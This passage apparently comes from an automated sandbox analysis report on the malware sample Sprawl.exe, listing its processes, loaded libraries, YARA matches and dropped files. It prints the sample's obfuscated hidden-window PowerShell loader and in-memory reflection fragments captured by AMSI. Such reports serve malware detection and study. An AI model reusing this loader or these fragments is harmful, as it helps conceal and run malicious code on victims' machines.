            Source: msiexec.exe, 00000008.00000002.3378029055.0000000022055000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000022089000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000022095000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000022064000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000022046000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022BB6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B76000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022BAA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B84000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Sprawl.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\Sprawl.exeFile read: C:\Users\user\Desktop\Sprawl.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Sprawl.exe "C:\Users\user\Desktop\Sprawl.exe"
            Source: C:\Users\user\Desktop\Sprawl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Sprawl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Sprawl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"Jump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Sprawl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: e.pdb source: powershell.exe, 00000002.00000002.2754688897.0000000007553000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000004.00000002.2832741780.0000000008951000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2754688897.0000000007553000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000004.00000002.2855794933.000000000B95D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2786477517.000000000B78B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3358316175.0000000005B30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3358056875.0000000006390000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ecca $Demiskrdderiers $Djrv), (Risikovilligt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ejerbolig = [AppDomain]::CurrentDomain.GetAssemblies()$global:
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Colormaker)), $Reincur).DefineDynamicModule($Leafiest, $false).DefineType($Nielsignes, $Mosegrisen, [System.MulticastDelegate])$Kerneh
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ecca $Demiskrdderiers $Djrv), (Risikovilligt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ejerbolig = [AppDomain]::CurrentDomain.GetAssemblies()$global:
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Colormaker)), $Reincur).DefineDynamicModule($Leafiest, $false).DefineType($Nielsignes, $Mosegrisen, [System.MulticastDelegate])$Kerneh
            Source: C:\Users\user\Desktop\Sprawl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Users\user\Desktop\Sprawl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Users\user\Desktop\Sprawl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"Jump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D2CA78 push eax; mov dword ptr [esp], edx2_2_04D2CA8C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D20B35 push ebx; iretd 2_2_04D20B42
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D2D612 push 00000008h; iretd 2_2_04D2D614
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0785ED60 pushfd ; ret 2_2_0785ED61
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B792300 pushfd ; ret 2_2_0B79231D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C37E push esp; iretd 2_2_0B75C38E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75EBAF push es; retf 2_2_0B75EBB6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C38F push esp; iretd 2_2_0B75C3AD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B759074 push eax; ret 2_2_0B7590AC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B759841 push ebx; retf 2_2_0B759843
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B7598F8 pushad ; retf 2_2_0B7598FB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CE29E0 push eax; ret 8_2_21CE3CA5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CE3C90 push eax; ret 8_2_21CE3CA5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
